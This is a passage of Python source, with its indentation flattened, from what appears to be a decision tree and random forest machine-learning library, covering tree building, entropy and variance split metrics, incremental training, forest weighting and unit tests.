split_attr = kwargs.get('split_attr', None)
split_val = kwargs.get('split_val', None)
assert class_attr not in attributes
node = None
data = list(data) if isinstance(data, Data) else data
if wrapper.is_continuous_class:
stop_value = CDist(seq=[r[class_attr] for r in data])
# For a continuous class case, stop if all the remaining records have
# a variance below the given threshold.
stop = wrapper.leaf_threshold is not None \
and stop_value.variance <= wrapper.leaf_threshold
else:
stop_value = DDist(seq=[r[class_attr] for r in data])
# For a discrete class, stop if all remaining records have the same
# classification.
stop = len(stop_value.counts) <= 1
if not data or len(attributes) <= 0:
# If the dataset is empty or the attributes list is empty, return the
# default value. The target attribute is not in the attributes list, so
# we need not subtract 1 to account for the target attribute.
if wrapper:
wrapper.leaf_count += 1
return stop_value
elif stop:
# If all the records in the dataset have the same classification,
# return that classification.
if wrapper:
wrapper.leaf_count += 1
return stop_value
else:
# Choose the next best attribute to best classify our data
best = choose_attribute(
data,
attributes,
class_attr,
fitness_func,
method=wrapper.metric)
# Create a new decision tree/node with the best attribute and an empty
# dictionary object--we'll fill that up next.
node = Node(tree=wrapper, attr_name=best)
node.n += len(data)
# Create a new decision tree/sub-node for each of the values in the
# best attribute field
for val in get_values(data, best):
# Create a subtree for the current value under the "best" field
subtree = create_decision_tree(
[r for r in data if r[best] == val],
[attr for attr in attributes if attr != best],
class_attr,
fitness_func,
split_attr=best,
split_val=val,
wrapper=wrapper)
# Add the new subtree to the empty dictionary object in our new
# tree/node we just created.
if isinstance(subtree, Node):
node._branches[val] = subtree
elif isinstance(subtree, (CDist, DDist)):
node.set_leaf_dist(attr_value=val, dist=subtree)
else:
raise Exception("Unknown subtree type: %s" % (type(subtree),))
return node
class Data:
"""
Parses, validates and iterates over tabular data in a file
or an generic iterator.
This does not store the actual data rows. It only stores the row schema.
"""
def __init__(self, inp, order=None, types=None, modes=None):
self.header_types = types or {} # {attr_name:type}
self.header_modes = modes or {} # {attr_name:mode}
if isinstance(order, str):
order = order.split(',')
self.header_order = order or [] # [attr_name,...]
# Validate header type.
if isinstance(self.header_types, (tuple, list)):
assert self.header_order, 'If header type names were not given, an explicit order must be specified.'
assert len(self.header_types) == len(self.header_order), 'Header order length must match header type length.'
self.header_types = dict(zip(self.header_order, self.header_types))
self.filename = None
self.data = None
if isinstance(inp, str):
filename = inp
assert os.path.isfile(filename), "File \"%s\" does not exist." % filename
self.filename = filename
else:
assert self.header_types, "No attribute types specified."
assert self.header_modes, "No attribute modes specified."
self.data = inp
self._class_attr_name = None
if self.header_modes:
for k, v in self.header_modes.items():
if v != CLS:
continue
self._class_attr_name = k
break
assert self._class_attr_name, "No class attribute specified."
def copy_no_data(self):
"""
Returns a copy of the object without any data.
"""
return type(self)(
[],
order=list(self.header_modes),
types=self.header_types.copy(),
modes=self.header_modes.copy())
def __len__(self):
if self.filename:
return max(0, open(self.filename).read().strip().count('\n'))
elif hasattr(self.data, '__len__'):
return len(self.data)
def __bool__(self):
return bool(len(self))
__nonzero__ = __bool__
@property
def class_attribute_name(self):
return self._class_attr_name
@property
def attribute_names(self):
self._read_header()
return [
n for n in self.header_types.keys()
if n != self._class_attr_name
]
def get_attribute_type(self, name):
if not self.header_types:
self._read_header()
return self.header_types[name]
@property
def is_continuous_class(self):
self._read_header()
return self.get_attribute_type(self._class_attr_name) == ATTR_TYPE_CONTINUOUS
def is_valid(self, name, value):
"""
Returns true if the given value matches the type for the given name
according to the schema.
Returns false otherwise.
"""
if name not in self.header_types:
return False
t = self.header_types[name]
if t == ATTR_TYPE_DISCRETE:
return isinstance(value, int)
elif t == ATTR_TYPE_CONTINUOUS:
return isinstance(value, (float, Decimal))
return True
def _read_header(self):
"""
When a CSV file is given, extracts header information the file.
Otherwise, this header data must be explicitly given when the object
is instantiated.
"""
if not self.filename or self.header_types:
return
rows = csv.reader(open(self.filename))
header = next(rows)
self.header_types = {} # {attr_name:type}
self._class_attr_name = None
self.header_order = [] # [attr_name,...]
for el in header:
matches = ATTR_HEADER_PATTERN.findall(el)
assert matches, "Invalid header element: %s" % (el,)
el_name, el_type, el_mode = matches[0]
el_name = el_name.strip()
self.header_order.append(el_name)
self.header_types[el_name] = el_type
if el_mode == ATTR_MODE_CLASS:
assert self._class_attr_name is None, "Multiple class attributes are not supported."
self._class_attr_name = el_name
else:
assert self.header_types[el_name] != ATTR_TYPE_CONTINUOUS, "Non-class continuous attributes are not supported."
assert self._class_attr_name, "A class attribute must be specified."
def validate_row(self, row):
"""
Ensure each element in the row matches the schema.
"""
clean_row = {}
if isinstance(row, (tuple, list)):
assert self.header_order, "No attribute order specified."
assert len(row) == len(self.header_order), "Row length does not match header length."
itr = zip(self.header_order, row)
else:
assert isinstance(row, dict)
itr = row.items()
for el_name, el_value in itr:
if self.header_types[el_name] == ATTR_TYPE_DISCRETE:
clean_row[el_name] = int(el_value)
elif self.header_types[el_name] == ATTR_TYPE_CONTINUOUS:
clean_row[el_name] = float(el_value)
else:
clean_row[el_name] = el_value
return clean_row
def _get_iterator(self):
if self.filename:
self._read_header()
itr = csv.reader(open(self.filename))
next(itr) # Skip header.
return itr
return self.data
def __iter__(self):
for row in self._get_iterator():
if not row:
continue
yield self.validate_row(row)
def split(self, ratio=0.5, leave_one_out=False):
"""
Returns two Data instances, containing the data randomly split between
the two according to the given ratio.
The first instance will contain the ratio of data specified.
The second instance will contain the remaining ratio of data.
If leave_one_out is True, the ratio will be ignored and the first
instance will contain exactly one record for each class label, and
the second instance will contain all remaining data.
"""
a_labels = set()
a = self.copy_no_data()
b = self.copy_no_data()
for row in self:
if leave_one_out and not self.is_continuous_class:
label = row[self.class_attribute_name]
if label not in a_labels:
a_labels.add(label)
a.data.append(row)
else:
b.data.append(row)
elif not a:
a.data.append(row)
elif not b:
b.data.append(row)
elif random.random() <= ratio:
a.data.append(row)
else:
b.data.append(row)
return a, b
USE_NEAREST = 'use_nearest'
MISSING_VALUE_POLICIES = set([
USE_NEAREST,
])
def _get_dd_int():
return defaultdict(int)
def _get_dd_dd_int():
return defaultdict(_get_dd_int)
def _get_dd_cdist():
return defaultdict(CDist)
class NodeNotReadyToPredict(Exception):
pass
class Node:
"""
Represents a specific split or branch in the tree.
"""
def __init__(self, tree, attr_name=None):
# The number of samples this node has been trained on.
self.n = 0
# A reference to the container tree instance.
self._tree = tree
# The splitting attribute at this node.
self.attr_name = attr_name
#### Discrete values.
# Counts of each observed attribute value, used to calculate an
# attribute value's probability.
# {attr_name:{attr_value:count}}
self._attr_value_counts = defaultdict(_get_dd_int)
# {attr_name:total}
self._attr_value_count_totals = defaultdict(int)
# Counts of each observed class value and attribute value in
# combination, used to calculate an attribute value's entropy.
# {attr_name:{attr_value:{class_value:count}}}
self._attr_class_value_counts = defaultdict(_get_dd_dd_int)
#### Continuous values.
# Counts of each observed class value, used to calculate a class
# value's probability.
# {class_value:count}
self._class_ddist = DDist()
# {attr_name:{attr_value:CDist(variance)}}
self._attr_value_cdist = defaultdict(_get_dd_cdist)
self._class_cdist = CDist()
self._branches = {} # {v:Node}
def __getitem__(self, attr_name):
assert attr_name == self.attr_name
branches = self._branches.copy()
for value in self.get_values(attr_name):
if value in branches:
continue
if self.tree.data.is_continuous_class:
branches[value] = self._attr_value_cdist[self.attr_name][value].copy()
else:
branches[value] = self.get_value_ddist(self.attr_name, value)
return branches
def _get_attribute_value_for_node(self, record):
"""
Gets the closest value for the current node's attribute matching the
given record.
"""
# Abort if this node has not get split on an attribute.
if self.attr_name is None:
return
# Otherwise, lookup the attribute value for this node in the given record.
attr = self.attr_name
attr_value = record[attr]
attr_values = self.get_values(attr)
if attr_value in attr_values:
return attr_value
else:
# The value of the attribute in the given record does not directly
# map to any previously known values, so apply a missing value
# policy.
policy = self.tree.missing_value_policy.get(attr)
assert policy, "No missing value policy specified for attribute %s." % (attr,)
if policy == USE_NEAREST:
# Use the value that the tree has seen that's also has the
# smallest Euclidean distance to the actual value.
assert self.tree.data.header_types[attr] in (ATTR_TYPE_DISCRETE, ATTR_TYPE_CONTINUOUS), "The use-nearest policy is invalid for nominal types."
nearest = (1e999999, None)
for _value in attr_values:
nearest = min(nearest, (abs(_value - attr_value), _value))
_, nearest_value = nearest
return nearest_value
else:
raise Exception("Unknown missing value policy: %s" % (policy,))
@property
def attributes(self):
return self._attr_value_counts.keys()
def get_values(self, attr_name):
"""
Retrieves the unique set of values seen for the given attribute
at this node.
"""
ret = list(self._attr_value_cdist[attr_name].keys()) \
+ list(self._attr_value_counts[attr_name].keys()) \
+ list(self._branches.keys())
ret = set(ret)
return ret
@property
def is_continuous_class(self):
return self._tree.is_continuous_class
def get_best_splitting_attr(self):
"""
Returns the name of the attribute with the highest gain.
"""
best = (-1e999999, None)
for attr in self.attributes:
best = max(best, (self.get_gain(attr), attr))
best_gain, best_attr = best
return best_attr
def get_entropy(self, attr_name=None, attr_value=None):
"""
Calculates the entropy of a specific attribute/value combination.
"""
is_con = self.tree.data.is_continuous_class
if is_con:
if attr_name is None:
# Calculate variance of class attribute.
var = self._class_cdist.variance
else:
# Calculate variance of the given attribute.
var = self._attr_value_cdist[attr_name][attr_value].variance
if self.tree.metric == VARIANCE1 or attr_name is None:
return var
elif self.tree.metric == VARIANCE2:
unique_value_count = len(self._attr_value_counts[attr_name])
attr_total = float(self._attr_value_count_totals[attr_name])
return var*(unique_value_count/attr_total)
else:
if attr_name is None:
# The total number of times this attr/value pair has been seen.
total = float(self._class_ddist.total)
# The total number of times each class value has been seen for
# this attr/value pair.
counts = self._class_ddist.counts
# The total number of unique values seen for this attribute.
unique_value_count = len(self._class_ddist.counts)
# The total number of times this attribute has been seen.
attr_total = total
else:
total = float(self._attr_value_counts[attr_name][attr_value])
counts = self._attr_class_value_counts[attr_name][attr_value]
unique_value_count = len(self._attr_value_counts[attr_name])
attr_total = float(self._attr_value_count_totals[attr_name])
assert total, "There must be at least one non-zero count."
n = max(2, len(counts))
if self._tree.metric == ENTROPY1:
# Traditional entropy.
return -sum(
(count/total)*math.log(count/total, n)
for count in counts.values()
)
elif self._tree.metric == ENTROPY2:
# Modified entropy that down-weights universally unique values.
# e.g. If the number of unique attribute values equals the total
# count of the attribute, then it has the maximum amount of unique
# values.
return -sum(
(count/total)*math.log(count/total, n)
for count in counts.values()
) + (unique_value_count/attr_total)
elif self._tree.metric == ENTROPY3:
# Modified entropy that down-weights universally unique values
# as well as features with large numbers of values.
return -sum(
(count/total)*math.log(count/total, n)
for count in counts.values()
) + 100*(unique_value_count/attr_total)
def get_gain(self, attr_name):
"""
Calculates the information gain from splitting on the given attribute.
"""
subset_entropy = 0.0
for value in self._attr_value_counts[attr_name].keys():
value_prob = self.get_value_prob(attr_name, value)
e = self.get_entropy(attr_name, value)
subset_entropy += value_prob * e
return (self.main_entropy - subset_entropy)
def get_value_ddist(self, attr_name, attr_value):
"""
Returns the class value probability distribution of the given
attribute value.
"""
assert not self.tree.data.is_continuous_class, "Discrete distributions are only maintained for discrete class types."
ddist = DDist()
cls_counts = self._attr_class_value_counts[attr_name][attr_value]
for cls_value, cls_count in cls_counts.items():
ddist.add(cls_value, count=cls_count)
return ddist
def get_value_prob(self, attr_name, value):
"""
Returns the value probability of the given attribute at this node.
"""
if attr_name not in self._attr_value_count_totals:
return
n = self._attr_value_counts[attr_name][value]
d = self._attr_value_count_totals[attr_name]
return n/float(d)
@property
def main_entropy(self):
"""
Calculates the overall entropy of the class attribute.
"""
return self.get_entropy()
def predict(self, record, depth=0):
"""
Returns the estimated value of the class attribute for the given
record.
"""
# Check if we're ready to predict.
if not self.ready_to_predict:
raise NodeNotReadyToPredict
# Lookup attribute value.
attr_value = self._get_attribute_value_for_node(record)
# Propagate decision to leaf node.
if self.attr_name:
if attr_value in self._branches:
try:
return self._branches[attr_value].predict(record, depth=depth+1)
except NodeNotReadyToPredict:
#TODO:allow re-raise if user doesn't want an intermediate prediction?
pass
# Otherwise make decision at current node.
if self.attr_name:
if self._tree.data.is_continuous_class:
return self._attr_value_cdist[self.attr_name][attr_value].copy()
else:
return self.get_value_ddist(self.attr_name, attr_value)
elif self._tree.data.is_continuous_class:
# Make decision at current node, which may be a true leaf node
# or an incomplete branch in a tree currently being built.
assert self._class_cdist is not None
return self._class_cdist.copy()
else:
return self._class_ddist.copy()
@property
def ready_to_predict(self):
return self.n > 0
@property
def ready_to_split(self):
"""
Returns true if this node is ready to branch off additional nodes.
Returns false otherwise.
"""
# Never split if we're a leaf that predicts adequately.
threshold = self._tree.leaf_threshold
if self._tree.data.is_continuous_class:
var = self._class_cdist.variance
if var is not None and threshold is not None and var <= threshold:
return False
else:
best_prob = self._class_ddist.best_prob
if best_prob is not None and threshold is not None and best_prob >= threshold:
return False
return self._tree.auto_grow \
and not self.attr_name \
and self.n >= self._tree.splitting_n
def set_leaf_dist(self, attr_value, dist):
"""
Sets the probability distribution at a leaf node.
"""
assert self.attr_name
assert self.tree.data.is_valid(self.attr_name, attr_value), "Value %s is invalid for attribute %s." % (attr_value, self.attr_name)
if self.is_continuous_class:
assert isinstance(dist, CDist)
assert self.attr_name
self._attr_value_cdist[self.attr_name][attr_value] = dist.copy()
else:
assert isinstance(dist, DDist)
# {attr_name:{attr_value:count}}
self._attr_value_counts[self.attr_name][attr_value] += 1
# {attr_name:total}
self._attr_value_count_totals[self.attr_name] += 1
# {attr_name:{attr_value:{class_value:count}}}
for cls_value, cls_count in dist.counts.items():
self._attr_class_value_counts[self.attr_name][attr_value][cls_value] += cls_count
def to_dict(self):
if self.attr_name:
# Show a value's branch, whether it's a leaf or another node.
ret = {self.attr_name:{}} # {attr_name:{attr_value:dist or node}}
values = self.get_values(self.attr_name)
for attr_value in values:
if attr_value in self._branches:
ret[self.attr_name][attr_value] = self._branches[attr_value].to_dict()
elif self._tree.data.is_continuous_class:
ret[self.attr_name][attr_value] = self._attr_value_cdist[self.attr_name][attr_value].copy()
else:
ret[self.attr_name][attr_value] = self.get_value_ddist(self.attr_name, attr_value)
return ret
elif self.tree.data.is_continuous_class:
# Otherwise we're at a continuous leaf node.
return self._class_cdist.copy()
else:
# Or a discrete leaf node.
return self._class_ddist.copy()
@property
def tree(self):
return self._tree
def train(self, record):
"""
Incrementally update the statistics at this node.
"""
self.n += 1
class_attr = self.tree.data.class_attribute_name
class_value = record[class_attr]
# Update class statistics.
is_con = self.tree.data.is_continuous_class
if is_con:
# For a continuous class.
self._class_cdist += class_value
else:
# For a discrete class.
self._class_ddist.add(class_value)
# Update attribute statistics.
for an, av in record.items():
if an == class_attr:
continue
self._attr_value_counts[an][av] += 1
self._attr_value_count_totals[an] += 1
if is_con:
self._attr_value_cdist[an][av] += class_value
else:
self._attr_class_value_counts[an][av][class_value] += 1
# Decide if branch should split on an attribute.
if self.ready_to_split:
self.attr_name = self.get_best_splitting_attr()
self.tree.leaf_count -= 1
for av in self._attr_value_counts[self.attr_name]:
self._branches[av] = Node(tree=self.tree)
self.tree.leaf_count += 1
# If we've split, then propagate the update to appropriate sub-branch.
if self.attr_name:
key = record[self.attr_name]
del record[self.attr_name]
self._branches[key].train(record)
class Tree:
"""
Represents a single grown or built decision tree.
"""
def __init__(self, data, **kwargs):
assert isinstance(data, Data)
self._data = data
# Root splitting node.
# This can be traversed via [name1][value1][name2][value2]...
self._tree = Node(self)
# The mean absolute error.
self.mae = CDist()
self._mae_clean = True
# Set the metric used to calculate the information gain after an attribute split.
if self.data.is_continuous_class:
self.metric = kwargs.get('metric', DEFAULT_CONTINUOUS_METRIC)
assert self.metric in CONTINUOUS_METRICS
else:
self.metric = kwargs.get('metric', DEFAULT_DISCRETE_METRIC)
assert self.metric in DISCRETE_METRICS
# Set metric to splitting nodes after a sample threshold has been met.
self.splitting_n = kwargs.get('splitting_n', 100)
# Declare the policy for handling missing values for each attribute.
self.missing_value_policy = {}
# Allow the tree to automatically grow and split after an update().
self.auto_grow = kwargs.get('auto_grow', False)
# Determine the threshold at which further splitting is unnecessary
# if enough accuracy has been achieved.
if self.data.is_continuous_class:
# Zero variance is the default continuous stopping criteria.
self.leaf_threshold = kwargs.get('leaf_threshold', 0.0)
else:
# A 100% probability is the default discrete stopping criteria.
self.leaf_threshold = kwargs.get('leaf_threshold', 1.0)
# The total number of leaf nodes.
self.leaf_count = 0
# The total number of samples trained on.
self.sample_count = 0
### Used for forests.
# The prediction accuracy on held-out samples.
self.out_of_bag_accuracy = CDist()
# Samples not given to the tree for training with which the
# out-of-bag accuracy is calculated from.
self._out_of_bag_samples = []
# The mean absolute error for predictions on out-of-bag samples.
self._out_of_bag_mae = CDist()
self._out_of_bag_mae_clean = True
def __getitem__(self, attr_name):
return self.tree[attr_name]
@classmethod
def build(cls, data, *args, **kwargs):
"""
Constructs a classification or regression tree in a single batch by
analyzing the given data.
"""
assert isinstance(data, Data)
if data.is_continuous_class:
fitness_func = gain_variance
else:
fitness_func = get_gain
t = cls(data=data, *args, **kwargs)
t._data = data
t.sample_count = len(data)
t._tree = create_decision_tree(
data=data,
attributes=data.attribute_names,
class_attr=data.class_attribute_name,
fitness_func=fitness_func,
wrapper=t,
)
return t
@property
def data(self):
return self._data
@property
def is_continuous_class(self):
return self.data.is_continuous_class
@classmethod
def load(cls, fn):
tree = pickle.load(open(fn))
assert isinstance(tree, cls), "Invalid pickle."
return tree
@property
def out_of_bag_mae(self):
"""
Returns the mean absolute error for predictions on the out-of-bag
samples.
"""
if not self._out_of_bag_mae_clean:
try:
self._out_of_bag_mae = self.test(self.out_of_bag_samples)
self._out_of_bag_mae_clean = True
except NodeNotReadyToPredict:
return
return self._out_of_bag_mae.copy()
@property
def out_of_bag_samples(self):
"""
Returns the out-of-bag samples list, inside a wrapper to keep track
of modifications.
"""
#TODO:replace with more a generic pass-through wrapper?
class O:
def __init__(self, tree):
self.tree = tree
def __len__(self):
return len(self.tree._out_of_bag_samples)
def append(self, v):
self.tree._out_of_bag_mae_clean = False
return self.tree._out_of_bag_samples.append(v)
def pop(self, v):
self.tree._out_of_bag_mae_clean = False
return self.tree._out_of_bag_samples.pop(v)
def __iter__(self):
for _ in self.tree._out_of_bag_samples:
yield _
return O(self)
def predict(self, record):
record = record.copy()
return self._tree.predict(record)
def save(self, fn):
pickle.dump(self, open(fn, 'w'))
def set_missing_value_policy(self, policy, target_attr_name=None):
"""
Sets the behavior for one or all attributes to use when traversing the
tree using a query vector and it encounters a branch that does not
exist.
"""
assert policy in MISSING_VALUE_POLICIES, "Unknown policy: %s" % (policy,)
for attr_name in self.data.attribute_names:
if target_attr_name is not None and target_attr_name != attr_name:
continue
self.missing_value_policy[attr_name] = policy
def test(self, data):
"""
Iterates over the data, classifying or regressing each element and then
finally returns the classification accuracy or mean-absolute-error.
"""
is_cont = self._data.is_continuous_class
agg = CDist()
for record in data:
actual_value = self.predict(record)
expected_value = record[self._data.class_attribute_name]
if is_cont:
assert isinstance(actual_value, CDist)
actual_value = actual_value.mean
agg += abs(actual_value - expected_value)
else:
assert isinstance(actual_value, DDist)
agg += actual_value.best == expected_value
return agg
def to_dict(self):
return self._tree.to_dict()
@property
def tree(self):
return self._tree
def train(self, record):
"""
Incrementally updates the tree with the given sample record.
"""
assert self.data.class_attribute_name in record, "The class attribute must be present in the record."
record = record.copy()
self.sample_count += 1
self.tree.train(record)
def _get_defaultdict_cdist():
return defaultdict(CDist)
class Forest:
def __init__(self, data, tree_kwargs=None, **kwargs):
assert isinstance(data, Data)
self._data = data
# The population of trees.
self.trees = []
# Arguments that will be passed to each tree during init.
self.tree_kwargs = tree_kwargs or {}
self.grow_method = kwargs.get('grow_method', GROW_RANDOM)
assert self.grow_method in GROW_METHODS, "Growth method %s is not supported." % (self.grow_method,)
# The number of trees in the forest.
self.size = kwargs.get('size', 10)
# The ratio of training samples given to each tree.
# The rest are held to test tree accuracy.
self.sample_ratio = kwargs.get('sample_ratio', 0.9)
# The maximum number of out of bag samples to store in each tree.
self.max_out_of_bag_samples = kwargs.get('max_out_of_bag_samples', 1000)
# The method for how we consolidate each tree's prediction into
# a single prediction.
self.weighting_method = kwargs.get('weighting_method', Forest.mean_oob_mae_weight)
# The criteria defining how and when old trees are removed from the
# forest and replaced by new trees.
# This is a callable that is given a list of all the current trees
# and returns a list of trees that should be removed.
self.fell_method = kwargs.get('fell_method', None)
def _fell_trees(self):
"""
Removes trees from the forest according to the specified fell method.
"""
if callable(self.fell_method):
for tree in self.fell_method(list(self.trees)):
self.trees.remove(tree)
def _get_best_prediction(self, record, train=True):
"""
Gets the prediction from the tree with the lowest mean absolute error.
"""
if not self.trees:
return
best = (+1e999999, None)
for tree in self.trees:
best = min(best, (tree.mae.mean, tree))
_, best_tree = best
prediction, tree_mae = best_tree.predict(record, train=train)
return prediction.mean
@staticmethod
def best_oob_mae_weight(trees):
"""
Returns weights so that the tree with smallest out-of-bag mean absolute error
"""
best = (+1e999999, None)
for tree in trees:
oob_mae = tree.out_of_bag_mae
if oob_mae is None or oob_mae.mean is None:
continue
best = min(best, (oob_mae.mean, tree))
best_mae, best_tree = best
if best_tree is None:
return
return [(1.0, best_tree)]
@staticmethod
def mean_oob_mae_weight(trees):
"""
Returns weights proportional to the out-of-bag mean absolute error for each tree.
"""
weights = []
active_trees = []
for tree in trees:
oob_mae = tree.out_of_bag_mae
if oob_mae is None or oob_mae.mean is None:
continue
weights.append(oob_mae.mean)
active_trees.append(tree)
if not active_trees:
return
weights = normalize(weights)
return zip(weights, active_trees)
def _grow_trees(self):
"""
Adds new trees to the forest according to the specified growth method.
"""
if self.grow_method == GROW_AUTO_INCREMENTAL:
self.tree_kwargs['auto_grow'] = True
while len(self.trees) < self.size:
self.trees.append(Tree(data=self.data, **self.tree_kwargs))
@property
def data(self):
return self._data
def predict(self, record):
"""
Attempts to predict the value of the class attribute by aggregating
the predictions of each tree.
Parameters:
weighting_formula := a callable that takes a list of trees and
returns a list of weights.
"""
# Get raw predictions.
# {tree:raw prediction}
predictions = {}
for tree in self.trees:
_p = tree.predict(record)
if _p is None:
continue
if isinstance(_p, CDist):
if _p.mean is None:
continue
elif isinstance(_p, DDist):
if not _p.count:
continue
predictions[tree] = _p
if not predictions:
return
# Normalize weights and aggregate final prediction.
weights = self.weighting_method(predictions.keys())
if not weights:
return
if self.data.is_continuous_class:
# Merge continuous class predictions.
total = sum(w*predictions[tree].mean for w, tree in weights)
else:
# Merge discrete class predictions.
total = DDist()
for weight, tree in weights:
prediction = predictions[tree]
for cls_value, cls_prob in prediction.probs:
total.add(cls_value, cls_prob*weight)
return total
def set_missing_value_policy(self, policy, target_attr_name=None):
for tree in self.trees:
tree.set_missing_value_policy(policy, target_attr_name)
def test(self, data):
"""
Iterates over the data, classifying or regressing each element and then
finally returns the classification accuracy or mean-absolute-error.
"""
is_cont = self.data.is_continuous_class
agg = CDist()
for record in data:
actual_value = self.predict(record)
if actual_value is None:
continue
expected_value = record[self._data.class_attribute_name]
if is_cont:
assert isinstance(actual_value, CDist), \
"Invalid prediction type: %s" % (type(actual_value),)
actual_value = actual_value.mean
agg += abs(actual_value - expected_value)
else:
assert isinstance(actual_value, DDist), \
"Invalid prediction type: %s" % (type(actual_value),)
agg += actual_value.best == expected_value
return agg
def train(self, record):
"""
Updates the trees with the given training record.
"""
self._fell_trees()
self._grow_trees()
for tree in self.trees:
if random.random() < self.sample_ratio:
tree.train(record)
else:
tree.out_of_bag_samples.append(record)
while len(tree.out_of_bag_samples) > self.max_out_of_bag_samples:
tree.out_of_bag_samples.pop(0)
class Test(unittest.TestCase):
def test_stat(self):
print('Testing statistics classes...')
nums = range(1, 10)
s = CDist()
seen = []
for n in nums:
seen.append(n)
s += n
print('mean:', s.mean)
print('variance:', get_variance(seen))
print('variance:', s.variance)
self.assertAlmostEqual(s.mean, get_mean(nums), 1)
self.assertAlmostEqual(s.variance, get_variance(nums), 2)
self.assertEqual(s.count, 9)
self.assertAlmostEqual(s.probability_lt(s.mean-s.standard_deviation*6), 0.0, 5)
self.assertAlmostEqual(s.probability_lt(s.mean+s.standard_deviation*6), 1.0, 5)
self.assertAlmostEqual(s.probability_gt(s.mean-s.standard_deviation*6), 1.0, 5)
self.assertAlmostEqual(s.probability_gt(s.mean+s.standard_deviation*6), 0.0, 5)
self.assertAlmostEqual(s.probability_in(s.mean, 50), 0.5, 5)
d1 = DDist(['a', 'b', 'a', 'a', 'b'])
d2 = DDist(['a', 'b', 'a', 'a', 'b'])
d3 = DDist(['a', 'b', 'a', 'a', 'b', 'c'])
self.assertEqual(d1, d2)
self.assertNotEqual(d1, d3)
self.assertNotEqual(d2, d3)
self.assertEqual(d1.best, 'a')
self.assertEqual(d1.best_prob, 3/5.)
self.assertEqual(d2.best, 'a')
self.assertEqual(d3.best, 'a')
print('Done.')
def test_data(self):
print('Testing data class...')
# Load data from a file.
data = Data('rdata1')
self.assertEqual(len(data), 16)
data = list(Data('rdata1'))
self.assertEqual(len(data), 16)
# Load data from memory or some other arbitrary source.
data = """a,b,c,d,cls
1,1,1,1,a
1,1,1,2,a
1,1,2,3,a
1,1,2,4,a
1,2,3,5,a
1,2,3,6,a
1,2,4,7,a
1,2,4,8,a
2,3,5,1,b
2,3,5,2,b
2,3,6,3,b
2,3,6,4,b
2,4,7,5,b
2,4,7,6,b
2,4,8,7,b
2,4,8,8,b""".strip().split('\n')
rows = list(csv.DictReader(data))
self.assertEqual(len(rows), 16)
rows = Data(
[r.split(',') for r in data[1:]],
order=['a', 'b', 'c', 'd', 'cls'],
types=dict(a=DIS, b=DIS, c=DIS, d=DIS, cls=NOM),
modes=dict(cls=CLS))
self.assertEqual(len(rows), 16)
self.assertEqual(len(list(rows)), 16)
for row in rows:
print(row)
a, b = rows.split(ratio=0.1)
self.assertEqual(len(rows), len(a)+len(b))
print('-'*80)
print('a:')
for row in a:
print(row)
print('-'*80)
print('b:')
for row in b:
print(row)
print('Done.')
def test_batch_tree(self):
print('Testing batch tree...')
# If we set no leaf threshold for a continuous class
# then there will be the same number of leaf nodes
# as there are number of records.
t = Tree.build(Data('rdata2'))
self.assertEqual(type(t), Tree)
print("Tree:")
pprint(t.to_dict(), indent=4)
self.assertEqual(set(t._tree['b'].keys()), set([1, 2, 3, 4]))
result = t.test(Data('rdata1'))
self.assertEqual(type(result), CDist)
print('MAE:', result.mean)
self.assertAlmostEqual(result.mean, 0.001368, 5)
self.assertEqual(t.leaf_count, 16)
# If we set a leaf threshold, then this will limit the number of leaf
# nodes created, speeding up prediction, at the expense of increasing
# the mean absolute error.
t = Tree.build(Data('rdata2'), leaf_threshold=0.0005)
print("Tree:")
pprint(t.to_dict(), indent=4)
print(t._tree['b'].keys())
self.assertEqual(t._tree.get_values('b'), set([1, 2, 3, 4]))
result = t.test(Data('rdata1'))
print('MAE:', result.mean)
self.assertAlmostEqual(result.mean, 0.00623, 5)
self.assertEqual(t.leaf_count, 10)
t = Tree.build(Data('cdata1'))
print("Tree:")
self.assertEqual(t['Age']['36 - 55'].attr_name, 'Marital Status')
self.assertEqual(t['Age']['36 - 55']\
.get_values('Marital Status'), set(['single', 'married']))
self.assertEqual(set(t['Age'].keys()), set(['< 18', '18 - 35', '36 - 55', '> 55']))
self.assertEqual(t['Age']['18 - 35'].best, 'won\'t buy')
self.assertEqual(t['Age']['36 - 55']['Marital Status']['single'].best, 'will buy')
d = t.to_dict()
pprint(d, indent=4)
result = t.test(Data('cdata1'))
print('Accuracy:', result.mean)
self.assertAlmostEqual(result.mean, 1.0, 5)
t = Tree.build(Data('cdata2'))
pprint(t.to_dict(), indent=4)
result = t.test(Data('cdata2'))
print('Accuracy:', result.mean)
self.assertAlmostEqual(result.mean, 1.0, 5)
result = t.test(Data('cdata3'))
print('Accuracy:', result.mean)
self.assertAlmostEqual(result.mean, 0.75, 5)
# Send it a corpus that's purposefully difficult to predict.
t = Tree.build(Data('cdata4'))
pprint(t.to_dict(), indent=4)
result = t.test(Data('cdata4'))
print('Accuracy:', result.mean)
self.assertAlmostEqual(result.mean, 0.5, 5)
# Send it a case it's never seen.
with self.assertRaises(AssertionError):
# By default, it should throw an exception because it hasn't been
# given a policy for resolving unseen attribute value.
t.predict(dict(a=1, b=2, c=3, d=4))
# But if we tell it to use the nearest value, then it should pass.
t.set_missing_value_policy(USE_NEAREST)
result = t.predict(dict(a=1, b=2, c=3, d=4))
print(result)
print('Done.')
def test_online_tree(self):
print('Testing online tree...')
rdata3 = Data('rdata3')
rdata3_lst = list(rdata3)
cdata2 = Data('cdata2')
cdata2_lst = list(cdata2)
cdata5 = Data('cdata5')
cdata5_lst = list(cdata5)
tree = Tree(cdata2, metric=ENTROPY1)
for row in cdata2:
tree.train(row)
node = tree._tree
attr_gains = [(node.get_gain(attr_name), attr_name) for attr_name in node.attributes]
attr_gains.sort()
# With traditional entropy, a b and c all evenly divide the class
# and therefore have the same gain, even though all three
# have different value frequencies.
self.assertEqual(attr_gains,
[(0.0, 'd'), (1.0, 'a'), (1.0, 'b'), (1.0, 'c')])
tree = Tree(cdata2, metric=ENTROPY2)
for row in cdata2:
tree.train(row)
self.assertEqual(set(node.attributes), set(['a', 'b', 'c', 'd']))
node = tree._tree
attr_gains = [(node.get_gain(attr_name), attr_name) for attr_name in node.attributes]
attr_gains.sort()
# With entropy metric 2, attributes that have fewer unique values
# will have a slightly greater gain relative to attributes with more
# unique values.
self.assertEqual(attr_gains,
[(-0.375, 'd'), (0.625, 'c'), (0.875, 'b'), (1.0, 'a')])
tree = Tree(rdata3, metric=VARIANCE1)
for row in rdata3:
tree.train(row)
node = tree._tree
self.assertEqual(set(node.attributes), set(['a', 'b', 'c', 'd']))
attr_gains = [(node.get_gain(attr_name), attr_name) for attr_name in node.attributes]
attr_gains.sort()
# With entropy metric 2, attributes that have fewer unique values
# will have a slightly greater gain relative to attributes with more
# unique values.
self.assertEqual([v for _, v in attr_gains], ['d', 'a', 'b', 'c'])
